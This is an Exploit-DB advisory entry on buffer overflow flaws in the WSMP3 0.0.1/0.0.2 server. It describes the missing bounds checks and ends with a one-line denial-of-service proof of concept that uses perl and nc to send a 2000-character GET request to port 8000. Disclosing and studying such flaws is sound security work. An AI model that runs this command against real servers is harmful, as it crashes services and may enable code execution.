WSMP3 0.0.1/0.0.2 - Multiple Buffer Overflow Vulnerabilities

2002-11-25T00:00:00
ID EDB-ID:22033
Type exploitdb
Reporter dong-h0un U
Modified 2002-11-25T00:00:00

Description

WSMP3 0.0.1/0.0.2 Multiple Buffer Overflow Vulnerabilities. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/6239/info

Several buffer overflow conditions have been reported for WSMP3. The vulnerability is due to improper bounds checking when copying data to local buffers.

An attacker can exploit this vulnerability by sending an overly long request to the vulnerable server. This will trigger the buffer overflow condition, resulting in memory corruption. Ovewriting sensitive memory with malicious values may allow an attacker to execute arbitrary code on the target system.

(echo "GET `perl -e 'print \"x\"x2000'`";cat)|nc 0 8000